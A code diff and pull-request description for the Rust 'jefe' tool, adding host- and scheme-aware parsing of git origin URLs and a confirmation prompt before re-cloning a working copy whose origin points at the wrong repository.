-        parse_origin_url("https://github.com/vybestack/llxprt-jefe"),
+        origin_display_shortform("https://github.com/vybestack/llxprt-jefe"),
         Some("vybestack/llxprt-jefe".to_owned())
     );
 }
@@ -37,7 +37,7 @@ fn parse_https_url_no_git_suffix() {
 #[test]
 fn parse_ssh_with_scheme() {
     assert_eq!(
-        parse_origin_url("ssh://git@github.com/vybestack/llxprt-jefe.git"),
+        origin_display_shortform("ssh://git@github.com/vybestack/llxprt-jefe.git"),
         Some("vybestack/llxprt-jefe".to_owned())
     );
 }
@@ -45,7 +45,7 @@ fn parse_ssh_with_scheme() {
 #[test]
 fn parse_bare_form() {
     assert_eq!(
-        parse_origin_url("vybestack/llxprt-jefe"),
+        origin_display_shortform("vybestack/llxprt-jefe"),
         Some("vybestack/llxprt-jefe".to_owned())
     );
 }
@@ -53,32 +53,32 @@ fn parse_bare_form() {
 #[test]
 fn parse_bare_form_with_git_suffix() {
     assert_eq!(
-        parse_origin_url("vybestack/llxprt-jefe.git"),
+        origin_display_shortform("vybestack/llxprt-jefe.git"),
         Some("vybestack/llxprt-jefe".to_owned())
     );
 }
 
 #[test]
 fn parse_empty_url_returns_none() {
-    assert_eq!(parse_origin_url(""), None);
-    assert_eq!(parse_origin_url("   "), None);
+    assert_eq!(origin_display_shortform(""), None);
+    assert_eq!(origin_display_shortform("   "), None);
 }
 
 #[test]
 fn parse_url_missing_repo_name_returns_none() {
-    assert_eq!(parse_origin_url("git@github.com:owner/"), None);
-    assert_eq!(parse_origin_url("https://github.com/owner/"), None);
+    assert_eq!(origin_display_shortform("git@github.com:owner/"), None);
+    assert_eq!(origin_display_shortform("https://github.com/owner/"), None);
 }
 
 #[test]
 fn parse_url_missing_owner_returns_none() {
-    assert_eq!(parse_origin_url("git@github.com:/repo"), None);
+    assert_eq!(origin_display_shortform("git@github.com:/repo"), None);
 }
 
 #[test]
 fn parse_url_with_extra_segments_returns_none() {
     assert_eq!(
-        parse_origin_url("https://github.com/owner/repo/extra"),
+        origin_display_shortform("https://github.com/owner/repo/extra"),
         None
     );
 }

--- a/src/git_info/tests.rs
+++ b/src/git_info/tests.rs
@@ -141,3 +141,177 @@ fn resolve_empty_github_repo_falls_back_to_git_detection() {
     let info = GitRepoInfo::resolve("", false, Path::new("/nonexistent"));
     assert!(info.origin_shortform.is_none());
 }
+
+// ── parse_repository_origin: host-aware parsing (issue #190 MUST-FIX #3) ─
+
+#[test]
+fn parse_repository_origin_ssh_form() {
+    assert_eq!(
+        parse_repository_origin("git@github.com:acme/widgets.git"),
+        Some(ParsedRepositoryOrigin {
+            host: "github.com".to_owned(),
+            owner_repo: "acme/widgets".to_owned(),
+        })
+    );
+}
+
+#[test]
+fn parse_repository_origin_https_form() {
+    assert_eq!(
+        parse_repository_origin("https://github.com/acme/widgets.git"),
+        Some(ParsedRepositoryOrigin {
+            host: "github.com".to_owned(),
+            owner_repo: "acme/widgets".to_owned(),
+        })
+    );
+}
+
+#[test]
+fn parse_repository_origin_ssh_scheme_form() {
+    assert_eq!(
+        parse_repository_origin("ssh://git@github.com/acme/widgets.git"),
+        Some(ParsedRepositoryOrigin {
+            host: "github.com".to_owned(),
+            owner_repo: "acme/widgets".to_owned(),
+        })
+    );
+}
+
+#[test]
+fn parse_repository_origin_bare_form_has_empty_host() {
+    assert_eq!(
+        parse_repository_origin("acme/widgets"),
+        Some(ParsedRepositoryOrigin {
+            host: String::new(),
+            owner_repo: "acme/widgets".to_owned(),
+        })
+    );
+}
+
+#[test]
+fn parse_repository_origin_lowercases_host() {
+    assert_eq!(
+        parse_repository_origin("git@GitHub.COM:acme/widgets.git"),
+        Some(ParsedRepositoryOrigin {
+            host: "github.com".to_owned(),
+            owner_repo: "acme/widgets".to_owned(),
+        })
+    );
+}
+
+#[test]
+fn parse_repository_origin_https_uppercase_host() {
+    assert_eq!(
+        parse_repository_origin("https://GitHub.COM/acme/widgets.git"),
+        Some(ParsedRepositoryOrigin {
+            host: "github.com".to_owned(),
+            owner_repo: "acme/widgets".to_owned(),
+        })
+    );
+}
+
+#[test]
+fn parse_repository_origin_gitlab_host() {
+    assert_eq!(
+        parse_repository_origin("https://gitlab.com/acme/widgets.git"),
+        Some(ParsedRepositoryOrigin {
+            host: "gitlab.com".to_owned(),
+            owner_repo: "acme/widgets".to_owned(),
+        })
+    );
+}
+
+#[test]
+fn parse_repository_origin_attacker_host() {
+    assert_eq!(
+        parse_repository_origin("git@attacker.example:acme/widgets.git"),
+        Some(ParsedRepositoryOrigin {
+            host: "attacker.example".to_owned(),
+            owner_repo: "acme/widgets".to_owned(),
+        })
+    );
+}
+
+#[test]
+fn parse_repository_origin_no_git_suffix() {
+    assert_eq!(
+        parse_repository_origin("https://github.com/acme/widgets"),
+        Some(ParsedRepositoryOrigin {
+            host: "github.com".to_owned(),
+            owner_repo: "acme/widgets".to_owned(),
+        })
+    );
+}
+
+#[test]
+fn parse_repository_origin_strips_whitespace() {
+    assert_eq!(
+        parse_repository_origin("  git@github.com:acme/widgets.git  "),
+        Some(ParsedRepositoryOrigin {
+            host: "github.com".to_owned(),
+            owner_repo: "acme/widgets".to_owned(),
+        })
+    );
+}
+
+#[test]
+fn parse_repository_origin_empty_returns_none() {
+    assert!(parse_repository_origin("").is_none());
+    assert!(parse_repository_origin("   ").is_none());
+}
+
+#[test]
+fn parse_repository_origin_missing_owner_returns_none() {
+    assert!(parse_repository_origin("git@github.com:/widgets.git").is_none());
+    assert!(parse_repository_origin("https://github.com//widgets.git").is_none());
+}
+
+#[test]
+fn parse_repository_origin_missing_repo_returns_none() {
+    assert!(parse_repository_origin("git@github.com:acme/").is_none());
+    assert!(parse_repository_origin("https://github.com/acme/").is_none());
+}
+
+#[test]
+fn parse_repository_origin_extra_segments_returns_none() {
+    assert!(parse_repository_origin("https://github.com/acme/widgets/extra").is_none());
+}
+
+#[test]
+fn parse_repository_origin_rejects_file_scheme() {
+    // file:// reads the local filesystem, NOT a remote host. It must be
+    // rejected regardless of the authority string.
+    assert!(parse_repository_origin("file://github.com/acme/widgets.git").is_none());
+    assert!(parse_repository_origin("file:///srv/repos/widgets.git").is_none());
+}
+
+#[test]
+fn parse_repository_origin_rejects_unknown_scheme() {
+    // Git supports pluggable remote helpers for arbitrary schemes; an unknown
+    // scheme cannot be trusted to target the named host.
+    assert!(parse_repository_origin("ftp://github.com/acme/widgets.git").is_none());
+    assert!(parse_repository_origin("myhelper://github.com/acme/widgets.git").is_none());
+}
+
+#[test]
+fn parse_repository_origin_scheme_is_case_insensitive() {
+    // HTTPS:// and https:// are the same scheme.
+    assert_eq!(
+        parse_repository_origin("HTTPS://github.com/acme/widgets.git"),
+        Some(ParsedRepositoryOrigin {
+            host: "github.com".to_owned(),
+            owner_repo: "acme/widgets".to_owned(),
+        })
+    );
+}
+
+#[test]
+fn parse_repository_origin_accepts_git_scheme() {
+    assert_eq!(
+        parse_repository_origin("git://github.com/acme/widgets.git"),
+        Some(ParsedRepositoryOrigin {
+            host: "github.com".to_owned(),
+            owner_repo: "acme/widgets".to_owned(),
+        })
+    );
+}

--- a/src/input.rs
+++ b/src/input.rs
@@ -66,22 +66,34 @@ pub enum SearchKeyRoute {
 
 /// Resolve the active input mode from current app state.
 #[must_use]
-pub fn input_mode_for_state(state: &AppState) -> InputMode {
-    match state.modal {
-        ModalState::Help => return InputMode::Help,
-        ModalState::Search { .. } => return InputMode::Search,
-        ModalState::ThemePicker { .. } => return InputMode::ThemePicker,
+/// Resolve the input mode from the active modal, if any.
+///
+/// Returns `None` when no modal is active (fall through to screen-mode
+/// detection).
+fn modal_input_mode(modal: &ModalState) -> Option<InputMode> {
+    match modal {
+        ModalState::Help => Some(InputMode::Help),
+        ModalState::Search { .. } => Some(InputMode::Search),
+        ModalState::ThemePicker { .. } => Some(InputMode::ThemePicker),
         ModalState::NewRepository { .. }
         | ModalState::EditRepository { .. }
         | ModalState::NewAgent { .. }
         | ModalState::EditAgent { .. }
-        | ModalState::WorkflowDispatch { .. } => return InputMode::Form,
+        | ModalState::WorkflowDispatch { .. } => Some(InputMode::Form),
         ModalState::ConfirmDeleteRepository { .. }
         | ModalState::ConfirmDeleteAgent { .. }
         | ModalState::ConfirmKillAgent { .. }
         | ModalState::PreflightPrompt { .. }
-        | ModalState::ConfirmIssueDirtyCopy { .. } => return InputMode::Confirm,
-        ModalState::None => {}
+        | ModalState::ConfirmIssueDirtyCopy { .. }
+        | ModalState::ConfirmIssueOriginMismatch { .. } => Some(InputMode::Confirm),
+        ModalState::None => None,
+    }
+}
+
+#[must_use]
+pub fn input_mode_for_state(state: &AppState) -> InputMode {
+    if let Some(mode) = modal_input_mode(&state.modal) {
+        return mode;
     }
 
     // Issues mode detection — must be before Normal fallback

--- a/src/mouse_routing.rs
+++ b/src/mouse_routing.rs
@@ -732,6 +732,7 @@ fn is_blocking_modal_open(state: &AppState) -> bool {
             | ModalState::ConfirmKillAgent { .. }
             | ModalState::PreflightPrompt { .. }
             | ModalState::ConfirmIssueDirtyCopy { .. }
+            | ModalState::ConfirmIssueOriginMismatch { .. }
             | ModalState::ThemePicker { .. }
             | ModalState::WorkflowDispatch { .. }
     )
@@ -751,7 +752,8 @@ fn active_overlay_for(state: &AppState) -> jefe::selection::OverlayPane {
         | jefe::state::ModalState::ConfirmDeleteAgent { .. }
         | jefe::state::ModalState::ConfirmKillAgent { .. }
         | jefe::state::ModalState::PreflightPrompt { .. }
-        | jefe::state::ModalState::ConfirmIssueDirtyCopy { .. } => {
+        | jefe::state::ModalState::ConfirmIssueDirtyCopy { .. }
+        | jefe::state::ModalState::ConfirmIssueOriginMismatch { .. } => {
             return OverlayPane::ConfirmModal;
         }
         // Explicit match (not wildcard) so new ModalState variants force a

--- a/src/selection/overlay_content.rs
+++ b/src/selection/overlay_content.rs
@@ -289,6 +289,51 @@ mod tests {
     }
 
     #[test]
+    fn confirm_modal_origin_mismatch_renders_actual_expected() {
+        use crate::domain::{LaunchSignature, SandboxEngine};
+        use crate::github::SendPayload;
+        let signature = LaunchSignature {
+            work_dir: std::path::PathBuf::from("/tmp"),
+            profile: String::new(),
+            mode_flags: Vec::new(),
+            llxprt_debug: String::new(),
+            pass_continue: false,
+            sandbox_enabled: false,
+            sandbox_engine: SandboxEngine::Podman,
+            sandbox_flags: String::new(),
+            remote: crate::domain::RemoteRepositorySettings::default(),
+            agent_kind: crate::domain::AgentKind::Llxprt,
+        };
+        let payload = SendPayload {
+            repository: "o/r".to_string(),
+            issue_number: 42,
+            ..Default::default()
+        };
+        let state = AppState {
+            modal: ModalState::ConfirmIssueOriginMismatch {
+                agent_id: AgentId("a1".to_string()),
+                work_dir: std::path::PathBuf::from("/tmp"),
+                signature,
+                payload,
+                actual: "other/repo".to_string(),
+                expected: "acme/widgets".to_string(),
+            },
+            ..Default::default()
+        };
+        let content = confirm_modal_lines(&state);
+        assert!(!content.lines.is_empty());
+        assert_eq!(content.lines[0], "Wrong Repository");
+        assert!(
+            content.lines[2].contains("other/repo"),
+            "modal must show actual origin: {content:?}"
+        );
+        assert!(
+            content.lines[2].contains("acme/widgets"),
+            "modal must show expected origin: {content:?}"
+        );
+    }
+
+    #[test]
     fn agent_chooser_empty_has_two_line_empty_state() {
         let state = AppState {
             issues_state: crate::state::IssuesState {

--- a/src/state/types.rs
+++ b/src/state/types.rs
@@ -100,6 +100,20 @@ pub enum ModalState {
         signature: LaunchSignature,
         payload: crate::github::SendPayload,
     },
+    /// Issue send: the working copy is a git repo whose `origin` does not
+    /// match the configured repository. Prompt the user to replace it with a
+    /// fresh clone before the issue-driven launch proceeds. The default is
+    /// no/halt; the user must explicitly opt in (Enter) before the
+    /// destructive remove+reclone. Escape (or `n`) aborts and leaves the
+    /// working copy untouched.
+    ConfirmIssueOriginMismatch {
+        agent_id: AgentId,
+        work_dir: std::path::PathBuf,
+        signature: LaunchSignature,
+        payload: crate::github::SendPayload,
+        actual: String,
+        expected: String,
+    },
     WorkflowDispatch {
         workflow: crate::domain::Workflow,
         fields: WorkflowDispatchFormFields,

--- a/src/ui/orchestration.rs
+++ b/src/ui/orchestration.rs
@@ -66,6 +66,22 @@ pub fn derive_confirm_modal_data(
             show_delete_work_dir: false,
             delete_work_dir: false,
         }),
+        ModalState::ConfirmIssueOriginMismatch {
+            actual, expected, ..
+        } => Some(ConfirmModalData {
+            title: String::from("Wrong Repository"),
+            message: format!(
+                "Working copy origin is {actual_repr}, expected {expected}. \
+                     Replace it with a fresh clone?",
+                actual_repr = if actual.is_empty() {
+                    "(no origin remote)"
+                } else {
+                    actual
+                },
+            ),
+            show_delete_work_dir: false,
+            delete_work_dir: false,
+        }),
         _ => None,
     }
 }
@@ -209,7 +225,8 @@ pub fn build_modal_element(
         | ModalState::ConfirmDeleteAgent { .. }
         | ModalState::ConfirmKillAgent { .. }
         | ModalState::PreflightPrompt { .. }
-        | ModalState::ConfirmIssueDirtyCopy { .. } => confirm_data.map(|data| {
+        | ModalState::ConfirmIssueDirtyCopy { .. }
+        | ModalState::ConfirmIssueOriginMismatch { .. } => confirm_data.map(|data| {
             element! {
                 ConfirmModal(
                     title: data.title,


### PR DESCRIPTION
## Summary

Closes #190.

When a user presses S to send an issue to an agent, jefe already cloned the repository if the agent work_dir did not exist (#184 / #166). This PR closes the remaining gap in the acceptance criteria: handling the case where the work_dir **exists and is a git repo but its origin points at a different repository**.

Previously, jefe would proceed into dirty-check + checkout+pull on a foreign repo, silently operating on (or clobbering) the wrong repository. Now it surfaces a confirm modal and requires explicit opt-in before any destructive action.

## Changes

- **Origin-mismatch detection** (`src/app_input/issue_git_prep.rs`): new `origins_match` predicate that parses the actual origin URL via the new `parse_repository_origin` in `src/git_info/mod.rs` and requires the host to be exactly github.com AND the owner/repo to match the configured `github_repo` (case-insensitively, matching GitHub identity semantics).
- **Scheme allowlist** (`src/git_info/mod.rs`): `parse_repository_origin` accepts only https/http/ssh/git schemes. file://, ftp://, and custom remote-helper schemes are rejected even when their authority reads github.com, since Git remote helpers can resolve arbitrary schemes anywhere.
- **PrepOutcome::OriginMismatch**: the target-aware prep returns a new outcome variant for both local and remote targets when the workdir is a git repo with a non-matching origin.
- **ConfirmIssueOriginMismatch modal** (`src/state/types.rs` + wiring): a confirm modal (default halt) mirroring the existing dirty-copy guard. On Enter it removes the mismatched workdir and re-clones from the configured identity; on Esc/n the launch aborts non-destructively.
- **Force-reclone ordering**: the clone URL is resolved from a validated CloneIdentity BEFORE the workdir is removed, so removal can never happen without a valid replacement URL.
- **Remote origin probe**: a missing origin (git exit 2) is distinguished from infrastructure failures (other nonzero exits) so genuine errors surface rather than masquerading as a safe "no origin".
- **Remote prep extraction**: the remote prep logic moved to `src/app_input/issue_prep_remote.rs` and local integration tests were deduplicated.

## Test coverage

- Origin matching: host-aware (GitLab/attacker host rejected), scheme-aware (file/ftp/custom rejected), case-insensitive owner/repo, bare-form/no-origin rejected.
- Clone-URL derivation from Repository via CloneIdentity (existing, unchanged).
- Origin-mismatch detection on local and remote targets.
- Happy path delegates to existing prep when the workdir already matches.
- Force-reclone exercises the production seam directly (remove then clone then prep).
- Remote origin probe classifier: exit-2 (no origin) returns None; SSH-255 and other nonzeros return Err.
- Modal Esc/n aborts non-destructively.
- TUI harness scenario documenting the modal interaction.

## Acceptance criteria mapping

- Work_dir does not exist: clones and proceeds (existing, #184).
- Work_dir exists and is the correct repo: no clone, existing flow unchanged.
- Work_dir exists but origin does not match: confirm prompt (default no/halt), user must opt in.
- Clone failures are surfaced clearly; no confusing downstream "not a git repository" error.
- .jefe/ and .llxprt/ exclusion semantics preserved through the new path.

## Verification

- cargo fmt --all --check: clean
- CLIPPY_CONF_DIR=.github/clippy cargo clippy --workspace --all-targets --all-features -- -D warnings: clean (both passes)
- bash scripts/check-source-file-size.sh: exit 0
- cargo test --workspace --all-features --locked: 2035 passed, 0 failed
- cargo build --workspace --all-features --locked: clean